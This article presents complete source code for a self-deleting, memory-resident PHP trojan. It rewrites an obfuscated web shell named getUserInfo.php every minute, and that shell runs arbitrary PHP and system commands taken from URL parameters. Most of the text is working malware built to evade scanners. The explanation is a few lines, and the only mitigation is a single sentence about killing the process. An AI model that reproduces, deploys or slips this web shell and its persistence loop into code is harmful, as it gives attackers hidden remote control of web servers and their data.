In-Memory PHP Trojan: Source Code, Explanation, and Mitigation

Preface: A memory trojan is a malicious program that runs entirely in RAM without a file on disk, making it highly stealthy, difficult to detect, and hard to eradicate.

In the information security field, the overall security posture depends on the weakest link, and the outcome of attacks hinges on the attacker’s skill and concealment techniques.

This article does not discuss whether the infection stemmed from arbitrary file upload or a near‑source attack that left malicious code on the production server.

Virus source code (very simple):

<code><?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = './getUserInfo.php';
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0='));
}
 sleep(60);
?>
</code>

Release virus body:

<code><?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET['e']);
if($e = @$_GET['e']) {
    $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));
    $func();
}
//system($_GET['s']);
if($s = @$_GET['s']) {
    $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');
    $f($s);
}
?>
</code>

Explanation:

The critical code is encoded to evade security scanners.

Once executed, the malware deletes its own file and remains resident in memory.

Even if the released trojan is detected and removed, it will recreate the same file.

Solution: Terminate the malicious process and delete the generated trojan file.